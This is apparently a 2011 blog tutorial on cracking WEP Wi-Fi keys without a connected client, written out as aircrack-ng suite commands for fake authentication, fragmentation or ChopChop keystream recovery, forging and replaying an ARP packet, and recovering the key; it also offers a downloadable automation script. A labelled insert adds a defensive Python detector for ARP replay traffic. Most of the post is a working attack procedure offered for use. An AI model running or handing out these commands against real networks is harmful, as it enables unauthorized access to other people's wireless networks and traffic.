Sunday 20 March 2011

Cracking WEP without a client! Old but still current ;)

Hi, Qkyrie here

Background

After reading quite a few tutorials in the past, I noticed that most of them used a simple injection technique, which does not always work on certain routers.

That's why I thought: why not write a second tutorial that covers another type of injection? Here's the final result:
the ChopChop or fragmentation attack.

ChopChop? Fragmentation?

What we will be doing is basically the same as in other tutorials, with one big difference: the injection.
In short, the steps are:

  • Use aireplay-ng to do a fake authentication with the access point
  • Use the aireplay-ng fragmentation or ChopChop attack to recover a keystream (PRGA)
  • Use packetforge-ng to create an ARP packet using that PRGA
  • Inject the created ARP packet

Enough background, here comes the real deal.

Knowing what interface to use

First of all, you'll have to know the name of your wireless interface, so type:

Code:
iwconfig

[Image: iwconfig.png]

Identifying your slave

Code:
airmon-ng start INTERFACE

You'll get a short message saying:
(monitor mode enabled on SPOOFEDINTERFACE)
In my case, the monitor interface was "mon0".

Code:
airodump-ng SPOOFEDINTERFACE

If you already know what channel your slave is on, you can add the argument "-c CHANNEL".

Write down the BSSID and ESSID; the CHANNEL comes in handy too.
Press Ctrl + C once you have written everything down.

[Image: airodump-ng.jpg]

Getting started with aireplay

The first aireplay command:
Code:
aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a BSSID -h YOUROWNMAC SPOOFEDINTERFACE

This performs a fake authentication with the router.

[Image: authentication.png]

The Fragmentation Attack

Code:
aireplay-ng -5 -b BSSID -h YOUROWNMAC SPOOFEDINTERFACE

Sometimes this technique fails; that means the fragmentation attack was unable to recover the PRGA, and you should try the ChopChop technique instead.

[Image: fragmentation.png]

ChopChop technique - only necessary when the fragmentation attack doesn't work

Code:
aireplay-ng -4 -h YOUROWNMAC -b BSSID SPOOFEDINTERFACE

-4 means we are using the ChopChop technique. Since in my case the fragmentation attack always works, I don't have a picture of the ChopChop technique, but visually it should give you the same outcome, though it might take longer.

packetforge-ng, our tool to create the ARP packet

Code:
packetforge-ng -0 -a BSSID -h YOUROWNMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet

This creates the ARP packet from the keystream file that the fragmentation attack produced (fragment-*.xor; if you used ChopChop instead, the file is named replay_dec-*.xor, so adjust the -y argument) and writes the packet to the file "arp-packet".

Turn on airodump-ng to start capturing data

Code:
airodump-ng -c CHANNEL --bssid BSSID -w out SPOOFEDINTERFACE

This starts airodump-ng on channel "CHANNEL", filtered to your BSSID, and writes everything to capture files prefixed "out".

Start injecting your crafted packet

Now it's time to start injecting, to get the data rate up. Open a new terminal and run:
Code:
aireplay-ng -2 -r arp-packet SPOOFEDINTERFACE
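
What the injection step above looks like from the other side: the replayed ARP request is one station sending a data frame of identical length hundreds of times per second, a pattern a wireless IDS can flag. The following is an added example, not code from this post or from the aircrack-ng project; the MAC addresses and frame records are constructed.

```python
from collections import defaultdict


def build_sample_frames():
    """Constructed monitor-mode observations: (time_s, source_mac, frame_len).
    One ordinary client sends frames of varying size at a modest rate; one
    station (constructed MAC) replays the same 68-byte WEP data frame 400
    times within a second, which is what aireplay-ng -2 looks like on the air."""
    frames = []
    for i in range(20):                      # legitimate client, 10 frames/s
        frames.append((i * 0.1, "00:11:22:33:44:55", 120 + (i * 37) % 400))
    for i in range(400):                     # replayed forged ARP request
        frames.append((0.5 + i * 0.0025, "de:ad:be:ef:00:01", 68))
    return frames


def replay_suspects(frames, window_s=1.0, threshold=100):
    """Return {source_mac: peak_count} for every station that sent at least
    `threshold` frames of one identical length within any `window_s` window.
    Identical length plus high rate from a single source is the replay
    signature; genuine ARP traffic from a client is sparse, not hammered."""
    times_by_key = defaultdict(list)
    for t, src, length in frames:
        times_by_key[(src, length)].append(t)
    suspects = {}
    for (src, _length), times in times_by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):        # sliding window over sorted times
            while times[end] - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold and count > suspects.get(src, 0):
                suspects[src] = count
    return suspects


if __name__ == "__main__":
    for mac, peak in replay_suspects(build_sample_frames()).items():
        print(f"possible ARP replay injection from {mac}: {peak} identical frames/s")
```

In practice you would feed it (timestamp, transmitter address, length) tuples parsed from a live capture and tune the threshold to your environment; the real fix is the one this post implies, which is that WEP is broken and should be replaced by WPA2/WPA3.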

Aircrack-ng

Once you've gathered enough packets, use aircrack-ng to start cracking. I sometimes leave aircrack-ng running from the beginning; it restarts after a certain amount of time ;-)

Code:
aircrack-ng -b BSSID out*.cap

That's it


Just for you guys, I have a small extra. If you want an automated version of this, I'll give you the script. All you have to adapt is the spoofed interface and the original interface. Mine were mon0 and wlan0; yours will probably be different.
The script can be found here:
Download personalcrack.sh

If you happen to have any questions, feel free to ask them ;-)


@_Qkyrie_
